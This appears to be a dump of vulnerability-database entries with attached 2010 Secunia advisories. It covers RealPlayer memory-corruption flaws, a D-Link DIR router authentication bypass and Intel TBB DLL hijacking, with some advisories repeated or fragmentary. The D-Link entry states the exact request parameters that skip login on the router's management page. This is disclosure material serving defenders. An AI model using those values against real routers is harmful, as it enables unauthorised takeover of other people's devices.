Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System compromise
Where: Remote
======================================================================
3) Vendor's Description of Software
"RealPlayer\xae SP lets you download video from thousands of Websites
\x96 free! Just click on the "download this video" button above the video
you want. It's just that easy. Now you can watch your favorite videos
anywhere, anytime."
Product Link:
http://www.real.com/realplayer/
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in RealPlayer, which
can be exploited by malicious people to compromise a user's system.
======================================================================
6) Time Table
01/03/2010 - Vendor notified.
01/03/2010 - Vendor response.
11/03/2010 - Vendor provides status update.
19/10/2010 - Vendor provides status update.
29/11/2010 - Vendor provides status update.
10/12/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0125 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-15/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
| VAR-201012-0017 | CVE-2010-0121 | RealNetworks RealPlayer of cook Vulnerability in codec |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The cook codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.5, Mac RealPlayer 11.0 through 12.0.0.1444, and Linux RealPlayer 11.0.2.1744 does not properly perform initialization, which has unspecified impact and attack vectors. Real Networks RealPlayer is prone to a memory corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"RealPlayer\xae SP lets you download video from thousands of Websites
\x96 free! Just click on the "download this video" button above the video
you want. It's just that easy. Now you can watch your favorite videos
anywhere, anytime."
Product Link:
http://www.real.com/realplayer/
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in RealPlayer, which
can be exploited by malicious people to potentially compromise a
user's system.
======================================================================
6) Time Table
24/02/2010 - Vendor notified.
25/02/2010 - Vendor response.
11/03/2010 - Vendor provides status update.
19/10/2010 - Vendor provides status update.
29/11/2010 - Vendor provides status update.
10/12/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-0121 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-9/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
| VAR-201012-0368 | No CVE | D-Link DIR Router \"bsc_lan.php\" Secure Bypass Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
D-Link DIR is a wireless router for the SOHO series. The D-Link DIR implementation has an error that allows remote attackers to bypass security restrictions and modify device configuration. The device does not correctly restrict access to the \"bsc_lan.php\" script. Requests with \"NO_NEED_AUTH\" parameter \"1\" and \"AUTH_GROUP\" parameter \"0\" can directly access the management interface. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
D-Link DIR Routers "bsc_lan.php" Security Issue
SECUNIA ADVISORY ID:
SA42425
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42425/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42425
RELEASE DATE:
2010-12-07
DISCUSS ADVISORY:
http://secunia.com/advisories/42425/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42425/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42425
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Craig Heffner has reported a security issue in multiple D-Link DIR
routers, which can be exploited by malicious people to bypass certain
security restrictions and compromise a vulnerable device.
This may be related to vulnerability #5:
SA33692
SOLUTION:
Restrict access to trusted hosts only (e.g. via network access
control lists).
PROVIDED AND/OR DISCOVERED BY:
Craig Heffner
ORIGINAL ADVISORY:
http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201209-0075 | CVE-2010-5269 | Intel Threading Building Blocks of tbb.dll Vulnerability gained in |
CVSS V2: 6.9 CVSS V3: - Severity: MEDIUM |
Untrusted search path vulnerability in tbb.dll in Intel Threading Building Blocks (TBB) 2.2.013 allows local users to gain privileges via a Trojan horse tbbmalloc.dll file in the current working directory, as demonstrated by a directory that contains a .pbk file. NOTE: some of these details are obtained from third party information. Supplementary information : CWE Vulnerability type by CWE-426: Untrusted Search Path ( Unreliable search path ) Has been identified. http://cwe.mitre.org/data/definitions/426.htmlA local user can create a Trojan horse in the current working directory. tbbmalloc.dll It may be possible to get permission through the file. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
Intel Threading Building Blocks (TBB) Insecure Library Loading
Vulnerability
SECUNIA ADVISORY ID:
SA42506
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/42506/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=42506
RELEASE DATE:
2010-12-07
DISCUSS ADVISORY:
http://secunia.com/advisories/42506/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/42506/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=42506
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been discovered in Intel Threading Building
Blocks (TBB), which can be exploited by malicious people to
compromise a user's system.
The vulnerability is caused due to the "tbb.dll" loading libraries
(e.g. tbbmalloc.dll) in an insecure manner. This can be exploited to
load arbitrary libraries when an application using this library e.g.
opens a file located on a remote WebDAV or SMB share.
Successful exploitation allows execution of arbitrary code.
The vulnerability is confirmed in version 2.2.013. Other versions may
also be affected.
SOLUTION:
Upgrade to version 3.0.4.127.
PROVIDED AND/OR DISCOVERED BY:
Originally reported in a CORE IMPACT exploit module for Adobe Pixel
Bender Toolkit by Core Security Technologies.
Additional information provided by Secunia Research.
ORIGINAL ADVISORY:
http://www.coresecurity.com/content/adobe-pixel-bender-toolkit-tbbmalloc-dll-hijacking-exploit-10-5
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------